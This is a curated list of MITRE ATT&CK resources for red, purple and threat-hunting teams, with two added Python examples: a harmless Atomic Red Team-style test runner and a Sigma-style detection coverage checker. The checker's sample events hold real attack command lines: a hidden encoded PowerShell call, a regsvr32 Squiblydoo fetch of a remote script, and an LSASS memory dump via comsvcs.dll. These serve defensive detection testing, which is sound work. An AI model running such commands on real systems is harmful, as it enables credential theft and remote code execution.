awesome-mitre-attack
A curated list of awesome resources related to Mitre ATT&CK™ Framework
https://github.com/infosecn1nja/awesome-mitre-attack
Red and Purple Team
Tools
- Empire - Post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent.
- Invoke-PSImage - Invoke-PSImage takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image.
- RE:TERNAL - RE:TERNAL is a centralised purple team simulation platform. Reternal uses agents installed on a simulation network to execute various known red-teaming techniques in order to test blue-teaming capabilities.
- VECTR - VECTR is a tool that facilitates tracking of your red and blue team testing activities to measure detection and prevention capabilities across different attack scenarios
- MITRE CALDERA - CALDERA is an automated adversary emulation system, built on the MITRE ATT&CK™ framework.
- Atomic Red Team - Small and highly portable detection tests based on MITRE's ATT&CK.
- Metta - An information security preparedness tool to do adversarial simulation.
- Red Team Automation (RTA) - RTA provides a framework of scripts designed to allow blue teams to test their detection capabilities against malicious tradecraft, modeled after MITRE ATT&CK.
- Cobalt Strike - Software for Adversary Simulations and Red Team Operations
- Purple Team ATT&CK Automation - Praetorian's public release of our Metasploit automation of MITRE ATT&CK™ TTPs
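Atomic Red Team, RTA and CALDERA all share one building block: a test tagged with an ATT&CK technique ID, with declared input arguments and an executor that runs a command on a supported platform, so that the red side can run it and the blue side can check whether it was detected. The following runner is an added example written for this page, not Atomic Red Team's own code (Invoke-AtomicRedTeam) or any of the listed projects'. The test definition is constructed in the shape of an Atomic Red Team YAML entry but held as a Python dict to avoid a PyYAML dependency; T1059.004 is "Command and Scripting Interpreter: Unix Shell" in ATT&CK, and the test body is a harmless echo. Only the `sh`/`bash` executors are implemented.

```python
"""Minimal runner for an Atomic Red Team-style test definition.

Added example: this is not Atomic Red Team's own runner (Invoke-AtomicRedTeam),
only an illustration of how a technique-tagged test is structured and executed.
"""
import platform
import re
import subprocess

# Constructed test in the shape of an Atomic Red Team YAML entry, held as a dict so
# the example needs no PyYAML. T1059.004 is "Command and Scripting Interpreter:
# Unix Shell" in ATT&CK; the test body is a harmless echo.
ATOMIC = {
    "attack_technique": "T1059.004",
    "display_name": "Command and Scripting Interpreter: Unix Shell",
    "atomic_tests": [
        {
            "name": "Run a marker command through sh (constructed, harmless)",
            "supported_platforms": ["linux", "macos"],
            "input_arguments": {
                "marker": {
                    "description": "String the test prints so a detection can key on it",
                    "type": "string",
                    "default": "ATOMIC_MARKER_T1059_004",
                },
            },
            "executor": {
                "name": "sh",
                "command": "echo '#{marker}'",
                "cleanup_command": "true",
            },
        }
    ],
}

PLACEHOLDER = re.compile(r"#\{(\w+)\}")  # Atomic Red Team's #{arg} syntax


def current_platform():
    """Map platform.system() onto the platform names Atomic Red Team uses."""
    names = {"Linux": "linux", "Darwin": "macos", "Windows": "windows"}
    return names.get(platform.system(), platform.system().lower())


def render_command(template, input_arguments, overrides=None):
    """Fill #{name} placeholders from overrides, then from declared defaults.

    A placeholder with neither is a defect in the test definition, so fail
    loudly rather than run a command with a literal '#{name}' left in it.
    """
    overrides = overrides or {}

    def substitute(match):
        name = match.group(1)
        if name in overrides:
            return str(overrides[name])
        if name in input_arguments:
            return str(input_arguments[name]["default"])
        raise KeyError(f"no value for input argument #{{{name}}}")

    return PLACEHOLDER.sub(substitute, template)


def run_atomic(technique, index=0, overrides=None, timeout=30):
    """Run one atomic test and return a record a purple team can log per technique."""
    test = technique["atomic_tests"][index]
    record = {
        "technique": technique["attack_technique"],
        "test": test["name"],
        "status": "skipped",
        "returncode": None,
        "stdout": "",
    }
    if current_platform() not in test["supported_platforms"]:
        return record
    executor = test["executor"]
    # Only the POSIX executors are implemented in this example; Atomic Red Team
    # also defines command_prompt, powershell and manual executors.
    if executor["name"] not in ("sh", "bash"):
        raise NotImplementedError(f"executor {executor['name']!r} not supported here")
    args = test.get("input_arguments", {})
    command = render_command(executor["command"], args, overrides)
    proc = subprocess.run([executor["name"], "-c", command],
                          capture_output=True, text=True, timeout=timeout)
    record.update(status="passed" if proc.returncode == 0 else "failed",
                  returncode=proc.returncode, stdout=proc.stdout)
    cleanup = executor.get("cleanup_command")
    if cleanup:  # run cleanup even when the test command itself failed
        subprocess.run([executor["name"], "-c", render_command(cleanup, args, overrides)],
                       capture_output=True, text=True, timeout=timeout)
    return record


if __name__ == "__main__":
    print(run_atomic(ATOMIC))
```

The record returned by `run_atomic` is the unit the tracking tools above (VECTR, RE:TERNAL) work with: technique ID plus test name plus outcome, to be joined later with whether the SIEM actually alerted. The `cleanup_command` is run unconditionally because a failed test that leaves artifacts behind is exactly what makes repeated purple-team runs drift from each other.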
Resources
- MITRE ATT&CK™ Evaluations Round 1 - APT3
- Getting Started with ATT&CK: Adversary Emulation and Red Teaming
- Live Adversary Simulation: Red and Blue Team Tactics
- PowerShell for Practical Purple Teaming
- Signal the ATT&CK: Part 2
- Adversary Emulation Plans
- Why we love threat emulation exercises (and how to get started with one of your own)
- MITRE ATT&CKcon 2018: From Automation to Analytics: Simulating the Adversary to Create Better Detections, David Herrald and Ryan Kovar, Splunk
- Living Off The Land Binaries and Scripts (and also Libraries)
- Purple Teaming with Vectr, Cobalt Strike, and MITRE ATT&CK
- Red Team Use of MITRE ATT&CK
- Purple Teaming with ATT&CK - x33fcon 2018
- MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with ATT&CK, David Middlehurst, Trustwave
- MITRE ATT&CKcon 2018: From Red VS Blue to Red ♥ Blue, Olaf Hartong and Vincent Van Mieghem, Deloitte
- Signal the ATT&CK: Part 1
Threat Hunting
Resources
- MITRE ATT&CK Windows Logging Cheat Sheets
- osquery-attck - Mapping the MITRE ATT&CK Matrix with Osquery
- ATTACKdatamap - A data source assessment on an event level to show potential coverage of the MITRE ATT&CK framework
- Splunk Mitre ATT&CK App - A Splunk app mapped to MITRE ATT&CK to guide your threat hunts
- HELK - A Hunting ELK (Elasticsearch, Logstash, Kibana) with advanced analytic capabilities.
- atomic-threat-coverage - Automatically generated actionable analytics designed to combat threats based on MITRE's ATT&CK.
- Wayfinder - Artificial Intelligence Agent to extract threat intelligence TTPs from feeds of malicious and benign event sources and automate threat hunting activities.
- pyattck - A Python package to interact with the MITRE ATT&CK Framework. Documentation: https://pyattck.readthedocs.io/en/latest/
- MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, SpecterOps and Jose Luis Rodriguez, Student
- Testing the Top MITRE ATT&CK Techniques: PowerShell, Scripting, Regsvr32
- Ten Ways Zeek Can Help You Detect the TTPs of MITRE ATT&CK
- SEC1244 - Cops and Robbers: Simulating the Adversary to Test Your Splunk Security Analytics
- Post-Exploitation Hunting with ATT&CK & Elastic
- How MITRE ATT&CK helps security operations
- MITRE Cyber Analytics Repository
- Defensive Gap Assessment with MITRE ATT&CK
- Finding Related ATT&CK Techniques
- Getting Started with ATT&CK: Detection and Analytics
- 2019 Threat Detection Report
- A Process is No One : Hunting for Token Manipulation
- auditd-attack - A Linux Auditd rule set mapped to MITRE's Attack Framework
- CyberMenace - A one stop shop hunting app in Splunk that can ingest Zeek, Suricata, Sysmon, and Windows event data to find malicious indicators of compromise relating to the MITRE ATT&CK Matrix.
- Mapping your Blue Team to MITRE ATT&CK™
- Quantify Your Hunt: Not Your Parent’s Red Teaming Redux
- ThreatHunter-Playbook
- Prioritizing the Remediation of Mitre ATT&CK Framework Gaps
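Several of the resources above (atomic-threat-coverage, ATTACKdatamap, auditd-attack, osquery-attck, the Sigma-tagged rule sets and the "Defensive Gap Assessment" talk) reduce to the same question: which ATT&CK techniques do my rules claim to cover, and which of those rules actually fire on telemetry from an emulation run? The following is an added example written for this page, not code from Sigma or any of the listed projects. It runs a constructed Sigma-style rule set over constructed Sysmon-like process-creation events, reads technique IDs from Sigma's `attack.tNNNN` tags, and reports three things per technique of interest: rules claiming it, sample events those rules fired on, and the two failure modes a gap assessment must separate (no rule at all, versus a rule that exists but never fired). Only the single-`selection` subset of Sigma's detection grammar is implemented (`contains`, `endswith`, `startswith` and exact match); real Sigma conditions can combine several selections and filters.

```python
"""Map a small Sigma-style rule set onto ATT&CK techniques and check coverage.

Added example: not code from Sigma, atomic-threat-coverage or ATTACKdatamap.
Rules, events and the technique list below are constructed for illustration.
"""
import re

# Sigma tags technique IDs as attack.t1059.001 (sub-technique) or attack.t1047.
ATTACK_TECHNIQUE_TAG = re.compile(r"^attack\.(t\d{4}(?:\.\d{3})?)$", re.IGNORECASE)

# Constructed rules in Sigma's shape. Only a single `selection` map with
# `condition: selection` is supported in this example.
RULES = [
    {"title": "Encoded PowerShell command line",
     "tags": ["attack.execution", "attack.t1059.001"],
     "detection": {"selection": {"Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
                                 "CommandLine|contains": ["-enc ", "-encodedcommand "]},
                   "condition": "selection"}},
    {"title": "Regsvr32 loading scrobj.dll (Squiblydoo)",
     "tags": ["attack.defense_evasion", "attack.t1218.010"],
     "detection": {"selection": {"Image|endswith": "\\regsvr32.exe",
                                 "CommandLine|contains": "scrobj.dll"},
                   "condition": "selection"}},
    {"title": "WMI process creation via wmic",
     "tags": ["attack.execution", "attack.t1047"],
     "detection": {"selection": {"Image|endswith": "\\wmic.exe",
                                 "CommandLine|contains": "process call create"},
                   "condition": "selection"}},
]

# Constructed Sysmon-like process-creation events (the base64 blob is filler).
EVENTS = [
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"Image": "C:\\Windows\\System32\\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s /u /i:http://example.test/p.sct scrobj.dll"},
    {"Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe notes.txt"},
    {"Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 624 C:\\temp\\l.dmp full"},
]

# Techniques the blue team has decided it must detect (constructed list).
TECHNIQUES_OF_INTEREST = ["T1059.001", "T1218.010", "T1003.001", "T1047"]


def technique_ids(rule):
    """ATT&CK technique IDs from a rule's tags, normalised to upper case."""
    ids = []
    for tag in rule.get("tags", []):
        m = ATTACK_TECHNIQUE_TAG.match(tag)
        if m:
            ids.append(m.group(1).upper())
    return ids


def _field_matches(event, key, expected):
    """One selection entry: 'Field|modifier'. A list value means any-of (OR)."""
    field, _, modifier = key.partition("|")
    actual = event.get(field)
    if actual is None:
        return False
    actual = str(actual).lower()  # Sigma string matching is case-insensitive
    for value in expected if isinstance(expected, list) else [expected]:
        value = str(value).lower()
        if modifier == "" and actual == value:
            return True
        if modifier == "contains" and value in actual:
            return True
        if modifier == "endswith" and actual.endswith(value):
            return True
        if modifier == "startswith" and actual.startswith(value):
            return True
    return False


def match_rule(rule, event):
    """All entries of the selection map must match (AND)."""
    selection = rule["detection"]["selection"]
    return all(_field_matches(event, key, value) for key, value in selection.items())


def coverage_report(rules, events, techniques):
    """Per technique: rules that claim it and how many sample events they fired on."""
    report = {t: {"rules": [], "hits": 0} for t in techniques}
    for rule in rules:
        hits = sum(1 for event in events if match_rule(rule, event))
        for technique in technique_ids(rule):
            entry = report.setdefault(technique, {"rules": [], "hits": 0})
            entry["rules"].append(rule["title"])
            entry["hits"] += hits
    return report


def gaps(report):
    """Techniques with no rule at all."""
    return sorted(t for t, entry in report.items() if not entry["rules"])


def untested(report):
    """Techniques that have a rule, but the rule never fired on the sample telemetry."""
    return sorted(t for t, entry in report.items() if entry["rules"] and entry["hits"] == 0)


if __name__ == "__main__":
    report = coverage_report(RULES, EVENTS, TECHNIQUES_OF_INTEREST)
    for technique, entry in sorted(report.items()):
        print(f"{technique:10} rules={len(entry['rules'])} hits={entry['hits']}")
    print("gaps:", ", ".join(gaps(report)), "| untested:", ", ".join(untested(report)))
```

On the constructed data, T1003.001 shows up as a gap (the LSASS dump via comsvcs.dll in the last event has no rule at all) and T1047 shows up as untested (a wmic rule exists but no emulated event exercised it). Those are different remediation tickets: the first needs a rule and probably a data source, the second needs a red-team test added to the next run. A coverage matrix that counts rules per technique, which is what most "heatmap" tooling draws, cannot tell the two apart.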
Threat Intelligence
Tools
Resources